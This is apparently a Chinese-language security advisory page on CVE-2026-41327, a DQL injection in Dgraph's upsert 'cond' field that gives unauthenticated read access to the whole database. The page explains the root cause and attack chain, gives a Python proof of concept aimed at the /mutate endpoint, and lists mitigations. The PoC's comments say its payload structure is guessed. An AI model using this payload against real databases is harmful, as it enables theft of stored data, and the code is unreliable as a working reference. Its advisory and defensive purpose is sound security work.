IPBUF安全漏洞报告
English
CVE-2026-41327 CVSS 9.1 严重

CVE-2026-41327 Dgraph数据读取漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41327
漏洞类型
DQL注入
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Dgraph

相关标签

Dgraph注入漏洞DQL注入未授权访问严重漏洞

漏洞概述

Dgraph是一款开源分布式GraphQL数据库。在25.3.3版本之前,该产品存在一个严重的安全漏洞,允许未经身份验证的攻击者获取数据库中所有数据的完全读取权限。此漏洞主要影响Dgraph的默认配置(即未启用ACL的情况)。攻击者只需向/mutate端点发送一个精心构造的HTTP POST请求,在upsert操作的cond字段中注入恶意代码,即可成功利用该漏洞。该问题已在25.3.3版本中得到修复。

技术细节

该漏洞的根本原因在于Dgraph在处理upsert变更请求时,对`cond`参数的输入验证和过滤机制存在严重缺陷。服务器端代码直接将用户提供的`cond`值通过`strings.Builder.WriteString`方法拼接到DQL查询字符串中。虽然代码中包含了一个`strings.Replace`操作,但这仅是表面上的字符替换,并未提供实质性的安全过滤。由于缺乏任何形式的转义、参数化处理或结构验证,攻击者可以在`cond`字符串中注入额外的DQL查询块。DQL解析器会将这段恶意代码误认为是语法上有效的命名查询块,并在服务器端执行。执行后,查询结果会直接包含在HTTP响应中返回给攻击者。由于该漏洞影响默认未启用访问控制列表(ACL)的配置,攻击者无需任何身份验证即可利用此缺陷,窃取数据库中的敏感信息。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在运行Dgraph数据库,且端口(通常为8080)对公网开放。
STEP 2
漏洞利用
攻击者向/mutate?commitNow=true端点发送一个特制的HTTP POST请求,请求中包含upsert变更操作,并在cond字段中植入了恶意的DQL查询代码。
STEP 3
代码执行
服务器端接收请求,由于缺乏对cond字段的过滤,直接将恶意代码拼接到DQL查询中。解析器执行注入的查询块,检索数据库中的敏感信息。
STEP 4
数据泄露
数据库将注入查询的执行结果包含在HTTP响应中返回给攻击者,导致未经授权的数据读取。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://localhost:8080/mutate?commitNow=true" # The vulnerability resides in the 'cond' field of an upsert mutation. # We inject a DQL query block to read data (e.g., list all nodes). # The injection bypasses escaping because the value is concatenated directly. # Payload structure based on the description payload = { "query": """ upsert { query { # Dummy query to satisfy the parser structure v as var(func: has(name)) } mutation { # The 'cond' parameter is where the injection happens. # We attempt to close the existing condition and inject a new query block. set { uid(v) <dgraph.type> "Injected" . } } } """, # If the API accepts a separate 'cond' parameter that gets embedded: # This simulates the crafted cond field mentioned in the CVE. "vars": {"$cond": "} @filter(has(name)) { result as func: uid(v) } all_data(func: uid(result)) { name uid } #"} } # Note: The exact JSON structure depends on the Dgraph API version, # but the vulnerability is triggered by the content of the 'cond' field. try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Request sent successfully. Check response for leaked data.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

Dgraph < 25.3.3

防御指南

临时缓解措施
如果无法立即升级版本,建议严格限制对Dgraph服务端口的网络访问,仅允许受信任的内部IP连接,并确保在生产环境中启用ACL功能以进行身份验证和授权。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表